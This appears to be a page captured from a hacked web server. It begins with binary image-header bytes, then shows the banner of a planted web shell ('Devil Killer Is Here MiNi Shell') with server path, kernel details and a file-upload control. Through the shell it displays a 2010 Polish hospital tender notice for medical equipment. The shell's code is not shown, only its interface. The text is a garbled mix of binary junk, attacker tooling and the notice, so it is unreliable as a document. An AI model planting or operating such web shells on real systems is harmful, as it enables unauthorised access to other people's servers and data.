JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/392796-N-2010.html

<p class="kh_header"><b>Kraków: DOSTAWA URZADZEŃ MEDYCZNYCH</b><br>
<b>Numer ogłoszenia: 392796 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 012 6308057, 6308059, faks 012 6308059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA URZADZEŃ MEDYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET NR 1
Przedmiotem zamówienia jest dostawa fabrycznie nowego aparatu do hemofiltracji - 1 kpl , montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33181000-2 
Urządzenia do terapii nerkowej-  kpl. 1
Producent 
Typ urządzenia 
Kraj pochodzenia 
Rok produkcji : 2010

I.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH

L.P.	FUNKCJA PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Aparat do hemofiltracji	TAK	1 szt.	
1.1	Hemofiltracja (cvvh)
	TAK		
1.2	Wolna ultrafiltracja (scuf)
	TAK		
1.3	Hemodializa (cvvhd)
	TAK		
1.4	Hemodiafiltracja (cvvhdf)
	TAK		
1.5	Wysokoobjętościowa hemofiltracja (hv-hf)
	TAK		
1.6	Plazmafereza (pf)
	TAK		
1.7	Hemoperfuzja (hp)
	TAK		
1.8	Komunikacja w języku polskim na ekranie
	TAK		
1.9	Zasilanie awaryjne na min. 15 min.
	TAK		
1.10	Zintegrowana pompa strzykawka 50 ml
	TAK		
1.11	Pomoc kontekstowa
	TAK		
1.12	System bilansujący grawimetryczny
	TAK		
1.13	Minimum trzy wagi: substytutu,
dializatu, filtratu
	TAK		
1.14	Dokładność ważenia 1 g
	TAK		
1.15	Pobór substytutu z 4 worków po 5l jednocześnie
	TAK		
1.16	Wydajność pompy krwi do  500 ml min.
	TAK		
1.17	Pomiary ciśnienia dostępu, powrotu, przed hemofiltrem, filtratu 
	TAK		
1.18	Zakres ciśnienia przed hemofiltrem  
0 - 750 mmhg
	TAK		
1.19	Regulacja temperatury substytutu dializatu dla pełnego zakresu oferowanych przepływów 
(35 - 39)°c
	TAK		
1.20	Możliwość wyłączenia ogrzewania płynów
	TAK		
1.21	Detektor przecieku krwi
	TAK		
1.22	Dwa niezależne detektory powietrza
	TAK		
1.23	Możliwość wymiany drenu żylnego w trakcie zabiegu
	TAK		
1.24	Dwie pulapki powietrza przed i za hemofiltrem
	TAK		
1.25	Niezależnie odpowietrzanie substytutu, dializatu, filtratu 
	TAK		
1.26	Przepływ substytutu do 160 ml min.
	TAK		
1.27	Moduł cytrynian wapń
	TAK		
1.28	cvvhd z regionalną antykoag. cytrynianową
	TAK		
2.	Wyposażenie	TAK		
2.1	Zestaw do dializy cytrynianowej	TAK	3 szt.	
2.2	Worek na filtry	TAK	6 szt.	
2.3	Cewnik silikonowy dwukanałowy 11,5 F 15 cm	TAK		
2.4	Cewnik silikonowy dwukanałowy 11,5 F 24 cm	TAK		
2.5	Dializat bez wapniowy 	TAK	90 worków	
2.6	4 procentowy cytrynian sodu 	TAK	42 worki	
2.7	46,7 procentowy cytrynian sodu amp. 5 ml 
	TAK	1 opak	
2.8	Rozdzielacz 2x4	TAK	3 szt.	
3.	Inne	TAK		
3.1	 Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		




               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
A.	OKRES GWARANCJI		
1.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
2.		Czas reakcji na zgłoszoną awarię [godz.]	max. 48 godzin	PODAĆ  ILE
3.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
4.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Dwa	PODAĆ  ILE
5.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze w przypadku naprawy trwającej powyżej 10 dni	TAK	
6.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
B.	SERWIS POGWARANCYJNY	
1.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 8 lat	PODAĆ  ILE
2.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
3.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
C.	SZKOLENIA	
1.		Personel medyczny i techniczny	TAK	
2.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ









PAKIET NR 2

Przedmiotem zamówienia jest dostawa fabrycznie nowego bronchofiberoskopu do trudnych intubacji- 1 kpl , montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV - 33168100-6
Endoskopy-  kpl. 1
Producent 
Typ urządzenia 
Kraj pochodzenia 
Rok produkcji : 2010

II.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH

L.P.	FUNKCJAPARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Bronchofiberoskop giętki		1 szt.	
1.1	Średnica zewnętrzna  max . 5,2 mm	TAK		
1.2	Głębia ostrości min. 4- 50 mm	TAK		
1.3	Długość robocza min. 600 mm	TAK		
1.4	Kanał roboczy 2,6 mm	TAK		
1.5	Pole widzenia min. 90	TAK		
1.6	Zgięcie końcówki min. 180 130 	TAK		
1.7	Wbudowane źródło światła - dioda LED	TAK		
1.8	Monitor LCD o przekątnej min. 2,5TAK		
1.9	Regulacja monitora 0-120	TAK		
1.10	Ekran obrotowy- prawo-lewo, góra-dół	TAK		
1.11	Funkcja zapisywania nieruchomych obrazów i filmów w wewnętrznej pamięci lub na karcie pamięci min. 1GB	TAK		
1.12	Format zapisu video- MJPEG	TAK		
2.	Dodatkowe wyposażenie	TAK		
2.1	Oprogramowanie Endo-Base do archiwizacji badań endoskopowych na dwa stanowiska	TAK		
2.2	Szczoteczka do biopsji mikrobiologicznej	TAK	50 szt	
2.3	Zaworki biopsyjne wielorazowe	TAK	10 szt	
2.4	Szczotka do gniazda biopsyjnego wielorazowa	TAK	1 szt.	
2.5	Szczoteczki jednorazowe do czyszczenia	TAK	50 szt	
2.6	Wieszak na endoskopy	TAK	1 szt	
2.7	Ładowarka  + dwa akumulatory?	TAK	1 kpl.	
3.	Inne	TAK		
3.1	Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		


               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
D.	OKRES GWARANCJI		
7.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
8.		Czas reakcji na zgłoszoną awarię [godz.]	max. 48 godzin	PODAĆ  ILE
9.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
10.		Liczba bezpłatnych przeglądów w czasie gwarancji 	dwa	PODAĆ  ILE
11.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze	TAK	
12.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
E.	SERWIS POGWARANCYJNY	
4.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
5.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
6.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
F.	SZKOLENIA	
3.		Personel medyczny i techniczny	TAK	
4.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ





PAKIET NR 3

Przedmiotem zamówienia jest dostawa fabrycznie nowego aparatu do rzutu minutowego serca- 1 kpl , montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33123210-3 

Producent 
Typ urządzenia 
Kraj pochodzenia 
Rok produkcji : 2010
Rok wprowadzenia modelu do produkcji 
III.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH

L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Monitor rzutu minutowego serca	TAK	1 szt.	
1.1	Parametry monitorowane:	TAK		
1.2	Rzut serca (CO);	TAK		
1.3	Objętość wyrzutowa (SV);	TAK		
1.4	Systemowy (obwodowy) opór naczyniowy (SVR);	TAK		
1.5	Zmienność objętości wyrzutowej (SVV);	TAK		
1.6	Saturacja w żyle głównej (ScvO2);	TAK		
1.7	Saturacji mieszanej krwi żylnej (SvO2);	TAK		
1.8	Możliwość podawania parametrów w postaci indeksowanej:	TAK		
1.9	Indeks sercowy (CI);	TAK		
1.10	Indeks objętości wyrzutowej (SVI);	TAK		
1.11	Indeks systemowego (obwodowego) oporu naczyniowego (SVRI)	TAK		
1.12	Prezentacja danych w postaci:	TAK		
1.13	Trendów graficznych;	TAK		
1.14	Trendów tabelarycznych;	TAK		
1.15	Wartości cyfrowych	TAK		
1.16	Możliwość kalkulacji dodatkowych parametrów:	TAK		
1.17	Tlen dostarczony (DO2);	TAK		
1.18	Indeks tlenu dostarczonego (DO2I)	TAK		
1.19	Maksymalnie jeden dostęp naczyniowy niezbędny do uzyskania pomiarów hemodynamicznych pacjenta, takich jak np.: CCO, SV, SVV	TAK		
1.20	Brak konieczności kalibracji systemu, przy pomiarach hemodynamicznych	TAK		
1.21	Możliwość przekazywania danych do zewnętrznego urządzenia (komputer, monitor przyłóżkowy)	TAK		
1.22	Płytka umożliwiająca umocowanie monitora do stojaka (kolumny)	TAK		
1.23	Waga aparatu poniżej 5 kg	TAK		
1.24	Menu w języku polskim	TAK		
1.25	Pamięć trendów min. 72 godz.	TAK		
1.26	Zasilanie sieciowe 230V - 50Hz	TAK		
2.	Linia pomiarowa do monitora rzutu serca 	TAK	15 szt.	
2.1	Czujnik  do ciągłego pomiaru rzutu serca:	TAK		
2.2	Długość linii 152 cm, 	TAK		
2.3	Dwa niezależne gniazda sygnału ciśnienia	TAK		
2.4	Połączenia gniazd sygnału ciśnienia - bezpinowe	TAK		
2.5	Brak konieczności kalibracji czujnika	TAK		
2.6	Częstotliwość własna czujnika > 200 Hz	TAK		
2.7	Szybkość przepływu w urządzeniu płuczącym przy ciśnieniu w worku i.v. do 300 mm Hg - 3 ml/godz.	TAK		
2.8	Metoda pomiaru rzutu minutowego małoinwazyjna (max 1 dostęp naczyniowy)	TAK		
2.9	Zestaw linii pomiarowych musi być kompatybilny z oferowanym monitorem.	TAK		
3.	Inne	TAK		
3.1	Oświadczenie potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		








               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
G.	OKRES GWARANCJI		
13.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
14.		Czas reakcji na zgłoszoną awarię [godz.] dni robocze	max. 48 godzin	PODAĆ  ILE
15.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
16.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Dwa	PODAĆ  ILE
17.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze	TAK	
18.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
H.	SERWIS POGWARANCYJNY	
7.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
8.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
9.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
I.	SZKOLENIA	
5.		Personel medyczny i techniczny	TAK	
6.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0, 33.16.81.00-6, 33.18.10.00-2, 33.12.32.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu uprawnienia do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu wiedzy i doświadczenia niezbędnego do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o dysponowaniu potencjałem technicznym do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2. Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3. Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
4. Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
  5.		Oświadczenie Wykonawcy w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału 
 w postępowaniu, zgodnie z art. 22 ustawy oraz dotyczące braku podstaw do wykluczenia w oparciu o art.    24 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
6. Oświadczenie potwierdzające, iż zaoferowany przedmiot zamówienia, zawarty 
w  FORMULARZU CENOWYM - OPISIE PRZEDMIOTU ZAMÓWIENIA, stanowiący ofertę, dla tych pozycji, które tego wymagają spełnia wymagania przewidziane w ustawie 
z 20  kwietnia 2004 roku  - o wyrobach medycznych (Dz. U. nr 93, poz. 896, z późn. zm.), a także w ustawie z  06 września 2001 roku - Przepisy wprowadzające ustawę - Prawo farmaceutyczne, ustawę  o wyrobach medycznych oraz ustawę o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz. U. nr 126, poz. 882, z późn. zm.) oraz ustawie z 20 kwietnia 2004 roku - o zmianie ustawy - Prawo farmaceutyczne, ustawy o zawodzie lekarza oraz ustawy - Przepisy wprowadzające ustawę - Prawo farmaceutyczne, ustawę o wyrobach medycznych oraz ustawę o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz. U. nr 92, poz. 1382, z późn. zm.) a także 
w obowiązujących przepisach Unii Europejskiej, ściśle według ZAŁĄCZNIKA NR 5 do SIWZ.
7.	Folder z opisem przedmiotu zamówienia 
8.  Oświadczenie, że zaoferowany sprzęt  jest fabrycznie nowy (rok produkcji 2010 rok), kompletny i gotowy do funkcjonowania bez żadnych dodatkowych zakupów i inwestycji, gwarantuje bezpieczeństwo pacjentów oraz personelu medycznego, a także zapewnia wymagany poziom świadczonych usług medycznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: -zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru, -wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego, - zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy), - działania siły wyższej lub wystąpienia stanu wyższej konieczności - wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach - zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe - zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia - omyłek pisarskich lub błędów rachunkowych, - mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, - jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego - innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SEKCJA ZAMÓWIEŃ PUBLICZNYCH 5 WOJSKOWEGO SZPITALA KLINICZNEGO SP ZOZ UL. WROCŁAWSKA 1-3; 30-901 KRAKÓW..</p>
